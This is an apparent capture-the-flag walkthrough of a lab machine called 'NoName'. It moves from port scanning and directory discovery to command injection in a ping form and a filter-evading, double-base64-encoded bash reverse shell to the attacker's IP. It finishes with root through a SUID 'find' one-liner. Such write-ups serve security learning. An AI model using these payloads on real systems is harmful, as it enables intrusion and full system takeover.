# NoName

## Nmap

```
sudo nmap 192.168.64.15 -p- -sS -sV                               

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
```

Checking out the target address shows we land on a page headed 'Fake Admin Area'. This page has a query box. I was unable to get any output from this or perform any command injection.

![/index.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-821bacefe79108edcb99d33e74548b91594b49e0%2Fimage.png?alt=media)

Further enumeration shows the /admin page being valid. This presents that page below.

![/admin](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-cebaccb7b4f8c7e8a704d635145ddeaf1b08b62d%2Fimage.png?alt=media)

Nothing interesting here but we do have something in the page source.

![/admin](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b0571a653a9848d32fa151674659b02fe121ab64%2Fimage.png?alt=media)

So far nowhere for this to be used but we can take a note of this. I decided from here to run some more specific enumeration against the target. Running `dirsearch.py` to append .txt and .php to end of a wordlist I was able to identify the /superadmin.php webpage.

```
python3 dirsearch.py -u http://192.168.64.15/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -t 75 --full-url --suffix=.txt,.php 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0d8815eb452f55d1143a70451b539cda103d86d0%2Fimage.png?alt=media)

So far this looks the same as the other page almost but we can actually test to see if the ping function works.

![/superadmin.php](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fcc4153136df643562fe80f325ecb0cda500b6d9%2Fimage.png?alt=media)

Running `tcpdump` on our attacking machine to listen in on the interface tun0 for ICMP packets we can ping our attacking machine and can confirm if we take receipt of ICMP packets.

Start `tcpdump`:

```
sudo tcpdump -i tun0 icmp
```

Then after pinging our attacking machine from the web interface we see results which show ping is working.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2582445e25582fb96cfc0efef7b7974546706507%2Fimage.png?alt=media)

Ideally we need to perform some form of command injection. Testing with the interface shows we need a IP at the begging of the command regardless. The linked GitHub has a large amount of command injection techniques to try: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection>

After some testing I found the following to work:

```
<IP> | <Command>
```

Switching over to `Burpsuite` we can see the value `192.168.49.79 | id` was sent as a query and returned valid results in the response.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a13d4a939b5e22fd7fe9ecdb1460005663d078c2%2Fimage.png?alt=media)

From here I ran the following command in a terminal to generate double base64 encoded output.

```
echo "echo $(echo 'bash -i >& /dev/tcp/192.168.49.79/80 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'

#Output

echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE9USXVNVFk0TGpRNUxqYzVMemd3SURBK0pqRUsK|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

Then encoded the output combined with the ping part of the command with Burpsuite encoder.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1a2335a7efe5bdfa640a80b4005f78b045c40875%2Fimage.png?alt=media)

Then submitted the URL encoded value as a parameter in `Burpsuite`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1c671f5562f667d52fdaf6b0d248e20d28cad64f%2Fimage.png?alt=media)

Resulting in a reverse shell on our `netcat` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4023bb06ec73bab09f65eb0c5c0fcb02e8de6c15%2Fimage.png?alt=media)

From here I then transferred over `linpeas` which after running found the binary 'find' has the SUID bit set.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3d8ee27c92ddd4b494e6b88d89c1daa3b9243cb8%2Fimage.png?alt=media)

Searching [GTFOBins](https://gtfobins.github.io/gtfobins/find/) we find this can be used to spawn a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9675e20d7a0c54ba846b4bb2ad50c74813bf2304%2Fimage.png?alt=media)

I then run the following command to gain a root shell.

```
/usr/bin/find . -exec /bin/sh -p \; -quit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-64580feb20fc80d4e0d9fb797eb4b7cf92bc608c%2Fimage.png?alt=media)